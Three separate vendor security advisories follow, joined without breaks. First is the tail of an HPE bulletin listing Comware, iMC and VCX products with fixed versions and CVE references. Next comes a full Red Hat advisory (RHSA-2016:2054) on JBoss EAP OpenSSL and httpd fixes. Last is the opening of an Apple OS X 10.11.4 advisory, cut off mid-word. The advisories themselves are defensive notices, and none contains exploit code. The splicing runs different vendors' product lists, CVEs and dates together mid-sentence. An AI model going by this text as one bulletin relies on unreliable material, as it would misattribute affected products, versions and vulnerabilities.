JG922A HP 1920-8G-PoE+ (180W) Switch\n - JG921A HP 1920-8G-PoE+ (65W) Switch\n - JG920A HP 1920-8G Switch\n + **V1910 (Comware 5) - Version: R1517P01**\n * HP Network Products\n - JE005A HP 1910-16G Switch\n - JE006A HP 1910-24G Switch\n - JE007A HP 1910-24G-PoE (365W) Switch\n - JE008A HP 1910-24G-PoE(170W) Switch\n - JE009A HP 1910-48G Switch\n - JG348A HP 1910-8G Switch\n - JG349A HP 1910-8G-PoE+ (65W) Switch\n - JG350A HP 1910-8G-PoE+ (180W) Switch\n + **SMB 1620 (Comware 5) - Version: R1110**\n * HP Network Products\n - JG914A HP 1620-48G Switch\n - JG913A HP 1620-24G Switch\n - JG912A HP 1620-8G Switch\n + **NJ5000 - Version: R1107**\n * HP Network Products\n - JH237A HPE FlexNetwork NJ5000 5G PoE+ Walljack\n\n\n**COMWARE 7 Products**\n\n + **12500 (Comware 7) - Version: R7377**\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n + **10500 (Comware 7) - Version: R7180**\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n + **12900 (Comware 7) - Version: R1150**\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n + **5900 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n + **MSR1000 (Comware 7) - Version: R0306P12**\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n + **MSR2000 (Comware 7) - Version: R0306P12**\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n + **MSR3000 (Comware 7) - Version: R0306P12**\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n + **MSR4000 (Comware 7) - Version: R0306P12**\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n + **VSR (Comware 7) - Version: E0322P01**\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n + **7900 (Comware 7) - Version: R2150**\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n + **5130 (Comware 7) - Version: R3113P02**\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n + **6125XLG - Version: R2432P01**\n * HP Network Products\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n + **6127XLG - Version: R2432P01**\n * HP Network Products\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n + **Moonshot - Version: R2432P01**\n * HP Network Products\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n + **5700 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n + **5930 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n + **HSR6600 (Comware 7) - Version: R7103P09**\n * HP Network Products\n - JG353A HP HSR6602-G Router\n - JG354A HP HSR6602-XG Router\n - JG776A HP HSR6602-G TAA-compliant Router\n - JG777A HP HSR6602-XG TAA-compliant Router\n + **HSR6800 (Comware 7) - Version: R7103P09**\n * HP Network Products\n - JG361A HP HSR6802 Router Chassis\n - JG361B HP HSR6802 Router Chassis\n - JG362A HP HSR6804 Router Chassis\n - JG362B HP HSR6804 Router Chassis\n - JG363A HP HSR6808 Router Chassis\n - JG363B HP HSR6808 Router Chassis\n - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing\n - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit\n + **1950 (Comware 7) - Version: R3113P02**\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n + **7500 (Comware 7) - Version: R7180**\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n + **5510HI (Comware 7) - Version: R1120**\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n + **5130HI (Comware 7) - Version: R1120**\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n\n\n**iMC Products**\n\n + **IMC PLAT - Version: 7.2 E0403P04**\n * HP Network Products\n - JD125A HP IMC Std S/W Platform w/100-node\n - JD126A HP IMC Ent S/W Platform w/100-node\n - JD808A HP IMC Ent Platform w/100-node License\n - JD814A HP A-IMC Enterprise Edition Software DVD Media\n - JD815A HP IMC Std Platform w/100-node License\n - JD816A HP A-IMC Standard Edition Software DVD Media\n - JF288AAE HP Network Director to Intelligent Management Center\nUpgrade E-LTU\n - JF289AAE HP Enterprise Management System to Intelligent Management\nCenter Upgrade E-LTU\n - JF377A HP IMC Std S/W Platform w/100-node Lic\n - JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU\n - JF378A HP IMC Ent S/W Platform w/200-node Lic\n - JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU\n - JG546AAE HP IMC Basic SW Platform w/50-node E-LTU\n - JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\n - JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU\n - JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU\n - JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU\n - JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU\n + **IMC iNode - Version: 7.2 E0407**\n * HP Network Products\n - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JD435A HP A-IMC Endpoint Admission Defense Client Software\n - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n + **iMC UAM_TAM - Version: 7.1 E0406**\n * HP Network Products\n - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n + **IMC WSM - Version: 7.2 E0502P04**\n * HP Network Products\n - JD456A HP IMC WSM Software Module with 50-Access Point License\n - JF414A HP IMC Wireless Service Manager Software Module with 50-Access\nPoint License\n - JF414AAE HP IMC Wireless Service Manager Software Module with\n50-Access Point E-LTU\n - JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager\nModule Upgrade with 250 Access Point E-LTU\n - JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU\n - JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg\nwith 250-node E-LTU\n\n**VCX Products**\n\n + **VCX - Version: 9.8.19**\n * HP Network Products\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 21 February 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nReferences:\n\nCVE-2007-6750\nCVE-2011-4969\nCVE-2014-3508\nCVE-2014-3509\nCVE-2014-3511\nCVE-2014-3513\nCVE-2014-3569\nCVE-2014-3568\nCVE-2014-3567\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-0205\nCVE-2015-3194\nCVE-2015-3195\nCVE-2015-3237\nCVE-2015-6565\nCVE-2015-7501\nCVE-2015-7547\nCVE-2015-7995\nCVE-2015-8035\nCVE-2016-0705\nCVE-2016-0728\nCVE-2016-0799\nCVE-2016-2015\nCVE-2016-2017\nCVE-2016-2018\nCVE-2016-2019\nCVE-2016-2020\nCVE-2016-2021\nCVE-2016-2022\nCVE-2016-2024\nCVE-2016-2030\nCVE-2016-2842\nPSRT110092\nPSRT110093\nPSRT110094\nPSRT110095\nPSRT110096\nPSRT110138\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.10 natives update on RHEL 7\nAdvisory ID: RHSA-2016:2054-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-2054.html\nIssue date: 2016-10-12\nCVE Names: CVE-2015-3183 CVE-2015-3195 CVE-2015-4000 \n CVE-2016-2105 CVE-2016-2106 CVE-2016-2108 \n CVE-2016-2109 CVE-2016-3110 CVE-2016-4459 \n=====================================================================\n\n1. Summary:\n\nUpdated packages that provide Red Hat JBoss Enterprise Application Platform\n6.4.10 natives, fix several bugs, and add various enhancements are now\navailable for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss Enterprise Application Platform 6.4 for RHEL 7 Server - noarch, ppc64, x86_64\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nThis release includes bug fixes and enhancements, as well as a new release\nof OpenSSL that addresses a number of outstanding security flaws. For\nfurther information, see the knowledge base article linked to in the\nReferences section. All users of Red Hat JBoss Enterprise Application\nPlatform 6.4 on Red Hat Enterprise Linux 7 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the update\nto take effect. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. An attacker could use this flaw to create a specially crafted\ncertificate which, when verified or re-encoded by OpenSSL, could cause it\nto crash, or execute arbitrary code using the permissions of the user\nrunning an application compiled against the OpenSSL library. \n(CVE-2016-2108)\n\n* Multiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3183)\n\n* A memory leak vulnerability was found in the way OpenSSL parsed PKCS#7\nand CMS data. (CVE-2015-3195)\n\n* A flaw was found in the way the TLS protocol composes the Diffie-Hellman\nexchange (for both export and non-export grade cipher suites). An attacker\ncould use this flaw to downgrade a DHE connection to use export-grade key\nsizes, which could then be broken by sufficient pre-computation. This can\nlead to a passive man-in-the-middle attack in which the attacker is able to\ndecrypt all traffic. (CVE-2015-4000)\n\n* An integer overflow flaw, leading to a buffer overflow, was found in the\nway the EVP_EncodeUpdate() function of OpenSSL parsed very large amounts of\ninput data. A remote attacker could use this flaw to crash an application\nusing OpenSSL or, possibly, execute arbitrary code with the permissions of\nthe user running that application. (CVE-2016-2105)\n\n* An integer overflow flaw, leading to a buffer overflow, was found in the\nway the EVP_EncryptUpdate() function of OpenSSL parsed very large amounts\nof input data. A remote attacker could use this flaw to crash an\napplication using OpenSSL or, possibly, execute arbitrary code with the\npermissions of the user running that application. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). (CVE-2016-3110)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. An\napplication using OpenSSL that accepts untrusted ASN.1 BIO input could be\nforced to allocate an excessive amount of data. (CVE-2016-2109)\n\n* It was discovered that specifying configuration with a JVMRoute path\nlonger than 80 characters will cause segmentation fault leading to a server\ncrash. (CVE-2016-4459)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2105, and CVE-2016-2106 and Michal Karm Babacek for\nreporting CVE-2016-3110. The CVE-2016-4459 issue was discovered by Robert\nBost (Red Hat). Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno\nBAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; and Guido Vranken as the original reporter of CVE-2016-2105\nand CVE-2016-2106. \n\n4. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1223211 - CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks\n1243887 - CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser\n1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1326320 - CVE-2016-3110 mod_cluster: remotely Segfault Apache http server\n1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute\n1345989 - RHEL7 RPMs: Upgrade mod_cluster-native to 1.2.13.Final-redhat-1\n1345993 - RHEL7 RPMs: Upgrade mod_jk to 1.2.41.redhat-1\n1345997 - RHEL7 RPMs: Upgrade tomcat-native to 1.1.34\n\n6. Package List:\n\nRed Hat JBoss Enterprise Application Platform 6.4 for RHEL 7 Server:\n\nSource:\nhornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.src.rpm\nhttpd22-2.2.26-56.ep6.el7.src.rpm\njbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.src.rpm\nmod_jk-1.2.41-2.redhat_4.ep6.el7.src.rpm\ntomcat-native-1.1.34-5.redhat_1.ep6.el7.src.rpm\n\nnoarch:\njbcs-httpd24-1-3.jbcs.el7.noarch.rpm\njbcs-httpd24-runtime-1-3.jbcs.el7.noarch.rpm\n\nppc64:\nhornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm\nhornetq-native-debuginfo-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm\nhttpd22-2.2.26-56.ep6.el7.ppc64.rpm\nhttpd22-debuginfo-2.2.26-56.ep6.el7.ppc64.rpm\nhttpd22-devel-2.2.26-56.ep6.el7.ppc64.rpm\nhttpd22-manual-2.2.26-56.ep6.el7.ppc64.rpm\nhttpd22-tools-2.2.26-56.ep6.el7.ppc64.rpm\njbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-debuginfo-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-devel-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-libs-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-perl-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-static-1.0.2h-4.jbcs.el7.ppc64.rpm\njbossas-hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm\njbossas-jbossweb-native-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm\nmod_jk-ap22-1.2.41-2.redhat_4.ep6.el7.ppc64.rpm\nmod_jk-debuginfo-1.2.41-2.redhat_4.ep6.el7.ppc64.rpm\nmod_ldap22-2.2.26-56.ep6.el7.ppc64.rpm\nmod_ssl22-2.2.26-56.ep6.el7.ppc64.rpm\ntomcat-native-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm\ntomcat-native-debuginfo-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm\n\nx86_64:\nhornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm\nhornetq-native-debuginfo-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm\nhttpd22-2.2.26-56.ep6.el7.x86_64.rpm\nhttpd22-debuginfo-2.2.26-56.ep6.el7.x86_64.rpm\nhttpd22-devel-2.2.26-56.ep6.el7.x86_64.rpm\nhttpd22-manual-2.2.26-56.ep6.el7.x86_64.rpm\nhttpd22-tools-2.2.26-56.ep6.el7.x86_64.rpm\njbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-devel-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-libs-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-perl-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-static-1.0.2h-4.jbcs.el7.x86_64.rpm\njbossas-hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm\njbossas-jbossweb-native-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm\nmod_jk-ap22-1.2.41-2.redhat_4.ep6.el7.x86_64.rpm\nmod_jk-debuginfo-1.2.41-2.redhat_4.ep6.el7.x86_64.rpm\nmod_ldap22-2.2.26-56.ep6.el7.x86_64.rpm\nmod_ssl22-2.2.26-56.ep6.el7.x86_64.rpm\ntomcat-native-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm\ntomcat-native-debuginfo-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-3183\nhttps://access.redhat.com/security/cve/CVE-2015-3195\nhttps://access.redhat.com/security/cve/CVE-2015-4000\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-3110\nhttps://access.redhat.com/security/cve/CVE-2016-4459\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/2688611\nhttps://access.redhat.com/solutions/222023\nhttps://access.redhat.com/documentation/en-US/JBoss_Enterprise_Application_Platform/6.4/index.html\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=appplatform\u0026downloadType=securityPatches\u0026version=6.4\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX/nCuXlSAg2UNWIIRAq6gAKCk3O4+LVrC6nN6yUHOOzpm8GB7NQCcDcA0\nn7n6E5uqbAY0W1AG5Z+9yy8=\n=6ET2\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan 